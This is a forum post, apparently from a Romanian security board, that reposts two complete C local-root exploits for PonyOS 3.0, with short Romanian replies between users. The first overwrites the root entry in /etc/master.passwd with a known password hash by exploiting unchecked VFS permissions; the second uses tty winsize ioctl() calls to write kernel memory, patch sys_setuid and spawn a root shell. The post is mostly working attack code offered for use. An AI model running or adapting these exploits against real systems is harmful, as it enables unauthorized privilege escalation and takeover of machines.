Search the Community

# Exploit Title: PonyOS <= 3.0 VFS permissions exploit # Google Dork: [if applicable] # Date: 29th May 2015 # Exploit Author: Hacker Fantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: 3.0 # Tested on: 3.0 # CVE : N/A # Source: https://github.com/HackerFantastic/Public/blob/master/exploits/rarity.c /* MyLittleUnix <= 3.0 VFS permissions root exploit ================================================ File permissions are not checked, we can abuse this to replace the root user password with our own and escalate our privileges. This exploit now 20% cooler and tested on latest 3.0 mlp OS. -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/stat.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> char* pwnystr = "root:07821d2459368443042007bf1c7cdf3c55284" "29a65f8f10ce388d301b47865a283147bfd290545b" "0b9b12ae622a8eb359497cb3635506f99d2f5e4c4e" "594cadd:0:0:HackerFantastic:/home/root:/bi" "n/sh:fancy\n"; int main(){ int fd, r; struct stat *fileinfo = malloc(sizeof(struct stat)); char *buffer, *line, *filenm = "/etc/master.passwd"; printf("[+] MyLittleUnix <=3.0 VFS permissions local root exploit\n"); fd = open(filenm,O_RDWR); r = stat(filenm,fileinfo); buffer = malloc((uint)fileinfo->st_size); if(buffer){ read(fd,buffer,fileinfo->st_size); } else{ printf("[!] No pwn for you pwnie\n"); exit(0); } lseek(fd,0,SEEK_SET); line = strtok(buffer,"\n"); while(line){ if(strstr(line,"root:")){ write(fd,pwnystr,strlen(pwnystr)); } else{ write(fd,line,strlen(line)); write(fd,"\n",strlen("\n")); } line = strtok(NULL,"\n"); } close(fd); printf("[-] 20percent COOLER! user 'root' password is 'pwnies'\n"); exit(0); } Source @ManutaDeAur exact ce i-am raspuns si lu byte-ul am sa iti raspund si tie:

# Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 # Exploit Author: HackerFantastic # Vendor Homepage: www.ponyos.org # Software Link: [download link if available] # Version: [app version] PonyOS <= 3.0 # Tested on: PonyOS 3.0 # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== PonyOS 0.4.99-mlp had two kernel vulnerabilities disclosed in April 2013 that could be leveraged to read/write arbitrary kernel memory. This is due to tty winsize ioctl() allowing to read/write arbitrary memory. This exploit patches the setuid system call to remove a root uid check allowing any process to obtain root privileges. John Cartwright found these flaws and others here: https://www.exploit-db.com/exploits/24933/ Written for educational purposes only. Enjoy! -- prdelka */ #include <stdio.h> #include <stdlib.h> #include <sys/ioctl.h> int main(){ struct winsize ws; printf("[+] PonyOS <= 3.0 ioctl() local root exploit\n"); memcpy(&ws,"\x90\x90\x90\x90\x8b\x45\x08\x89",8); ioctl(0, TIOCSWINSZ, &ws); ioctl(0, TIOCGWINSZ, (void *)0x0010f101); printf("[-] patched sys_setuid()\n"); __asm("movl $0x18,%eax"); __asm("xorl %ebx,%ebx"); __asm("int $0x7F"); printf("[-] Got root?\n"); system("/bin/sh"); } Source @Byte-ul nu am timp sa fac demo si nici "resursele necesare" am sa inchid thread-ul pentru a evita offtopic-ul.